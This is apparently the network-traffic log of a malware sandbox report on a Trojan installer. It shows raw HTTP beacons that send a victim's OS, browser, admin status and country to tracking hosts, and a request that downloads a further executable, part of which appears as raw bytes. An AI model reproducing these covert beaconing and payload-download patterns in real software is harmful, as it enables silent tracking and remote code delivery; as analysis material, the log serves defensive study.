Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: aiz9xgvD7qy5rUIX0A/NP8eg4AxSnrhnhzt4DhWxJ7ppeNItE57LynNWZEvIOl8x
x-amz-request-id: D9B49812856D47D8
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: aiz9xgvD7qy5rUIX0A/NP8eg4AxSnrhnhzt4DhWxJ7ppeNItE57LynNWZEvIOl8x..x-amz-request-id: D9B49812856D47D8..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1425597849 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: YfZq4aAKkD0QmkGnyQLA02D8v7W7u3mF5WZSA8yXI vCjaNgLa 3AbloBTh0B/lF
x-amz-request-id: 0326DD6CDACB1E14
Date: Thu, 05 Mar 2015 23:24:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: YfZq4aAKkD0QmkGnyQLA02D8v7W7u3mF5WZSA8yXI vCjaNgLa 3AbloBTh0B/lF..x-amz-request-id: 0326DD6CDACB1E14..Date: Thu, 05 Mar 2015 23:24:10 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: pA/BMrf6nnbcsXt9aUrjBMJXCjMg/rYN0bREwFw2IFJjiNAFiGowVVRm08n4cTXj
x-amz-request-id: 782D1254A2753524
Date: Thu, 05 Mar 2015 23:24:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tu J10nP 3UiJjMiersLzKMfUM//adluDe3txSAwe0xiPcLPCBY5gbiIfcRIhUyJ
x-amz-request-id: 856775D186715B3E
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: c7R66s0PbI6RE2OyTOiCC/kkDREmnq8XI9Rrb31NiEInzxWmSTj6svYElmM6GGW3
x-amz-request-id: EEA240B973A1ED0B
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: jf4p2TpI1QvS4utE gh41cCrCUXngSXk9kIDTep6JbEcK98dPVUaxRXECXnpLHcC
x-amz-request-id: FBE2853165EBC225
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: vncs5DFxlxNe5vB3cTxcHPuo4uYeUPMRYUmU2TsEieD4MwiL4d6lbiXiNTtRveSD
x-amz-request-id: 324E8B4267AD49B1
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1425597850 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: T31DEGAF6h4dLzhlC422YM7O0Gl5KZ7sCd1d6z6yoij0mBcnDMp3bJk9sLrV/JT3
x-amz-request-id: BF691D9E6E248501
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1425597851 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ttgnYaHLNdphi3cl2cTDyuw3wDrD9mFYxXExz2wOsce4Qf2LLcxOb9L72gQsFkhv
x-amz-request-id: C667B0063F2F2E11
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: l/XfenbIjxsKYwcGEyYw0ZvxKM/BB3qZcb8x/jIgM7qVoA0rMHto9 fjSHc1Dd i
x-amz-request-id: 535D90B37079E09D
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: l/XfenbIjxsKYwcGEyYw0ZvxKM/BB3qZcb8x/jIgM7qVoA0rMHto9 fjSHc1Dd i..x-amz-request-id: 535D90B37079E09D..Date: Thu, 05 Mar 2015 23:24:12 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1425597851 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: GjC3mnbWhImS6Wr09zk2cotmx45tUhke1isOX 7XHJNlTycAlHMdwhOd7bFM4b6K
x-amz-request-id: ED30DA0F391DC5A2
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Bg1LKYB9rFIZfFk8eM5mczTeInJb1ERcZkMR2FTGMF2uEoV/50FNN2GqmLo/GqCK
x-amz-request-id: 8EA97A25493FB8FC
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Bg1LKYB9rFIZfFk8eM5mczTeInJb1ERcZkMR2FTGMF2uEoV/50FNN2GqmLo/GqCK..x-amz-request-id: 8EA97A25493FB8FC..Date: Thu, 05 Mar 2015 23:24:12 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=1425597847 HTTP/1.1
Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: CI/xqrh7vLPioUT9C/lWQew4p49omDlNzRNIQi/xBgkXfaPPLX2CYk9Tx8Tri9jB
x-amz-request-id: C7467C452F157333
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: CI/xqrh7vLPioUT9C/lWQew4p49omDlNzRNIQi/xBgkXfaPPLX2CYk9Tx8Tri9jB..x-amz-request-id: C7467C452F157333..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....
GET /installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 HTTP/1.1
Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: vgIRq9xlWi7A2OtBmXsJCbotmSTVr5MK1z v0sz8o3fTTfSeKrYM1GfS4qpBlv w
x-amz-request-id: 3CBC5AFF8D68D5F6
Date: Thu, 05 Mar 2015 23:24:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 HTTP/1.1
Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: u8LTwYQJKffKricroarszKXJRYq9a3kbqfiiuvLg3 TDit7DU3UnBq7Kkmq7saVP
x-amz-request-id: 338D1C02DC56E30B
Date: Thu, 05 Mar 2015 23:24:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:09 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:55 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /utility.gif?report=fdata&f=3&c=1504&i=35&n=ms_about_to_exc&rnd=8354 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:24:00 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /outil/fuully/styi2/setup.exe_c HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461996"
Last-Modified: Wed, 04 Mar 2015 09:39:56 GMT
Cache-Control: max-age=2512
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop012.fr7.t,1425597835.cds019.fr7.sr,1425597834.dop003.dc1.r,1425597835.cds002.dc1.c,1425597835.cds019.fr7.pr
>.. ...Y:..<.J:.......[..B...s.......^..l)..(.F.3..<.._...af.m..3...XX...X;/.m.T.]..E9........BZ....... ...;..F.....n...fN....e G.'.o.....DR...>.?.H...U.wQi.r..,x.?.i./!..m....AZ.}1..V.s..X...>.`.-]...l..^...M.<..z...W...e.1h\...N.O}.c<........h..E7..8i......I3'9.. .G....R..c#......]....~..}jz..ZX.".yV....Q...v.....ZI..6....../..<.^`]..2s...l.L....[M......W..0....nI.}#\.....d..2.y{....6...Th......4K.1`*'...sI.)_.`.SL....i..U.j.9?.2...1....H).D...D..U@:AYP^....V'%.....!.....B0........E.[.H.".#.&..|f....X.1.#..N...d=K.......xU.....d...).j*m-D#....<_.;IT.*.#\.s....../.Z.YD../g../..*.8...P.#..7....a..I...>.%..Oj5.u.............V`j.>.[|..F_..e..\ .@!..)...a....>..E..>.Wa..{.........NiT.a.a.JPu.....Co$...6t...."n)..C....?D,.....%....F...(.;.<.{8...G....Oe...|.)..bs..=C......k....3....rr.....B. 0@......~.I(.. .]...5.d....B[Ip1..%...SW*u&..A....E.~...;NYk.%...E0j:Z...o...oV..t....~.......k.....#U..>M.KhPi.$..=q.k.a......QI.....r.....#=...%.2..2g...u%..>..NhG..$.(....v........ .AFgpJ.s......Y.t4U..@.L.=...g..............g.....=..().6..............{.-..f.......2....%f.........=....o,...T;...Y,..(j..k.#.....pWE..B..'p.y7.&.....$c.d..a..s.g..x....U.%5..G2.b..n.....~..d...7...XWf0...5.f..D[.Eq.5Oog...........!..u.......R.9~....G..K../........U.j......@)I.....m.$R.....C"...n.....@..<..=1,$...O[T.......%.#.....R]...6...~y.{.<...{....j...p..3%..7.S... e.!....^w.....e.<.../....z0.^..r....I...tc.>.*.....t..#.&dgks...0..F<Za..OK..=../.z.K..... ....S.RN...S..O.r.......
<<< skipped >>>
GET /utility.gif?report=fdata&f=3&c=1504&i=30&n=ms_download_success&rnd=7287 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:59 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /utility.gif?error=start&report=mini_s&ver=1504&action=na&ms_vr=3&clock=0&rnd=20175 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:54 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
Map
The Trojan connects to the servers at the folowing location(s):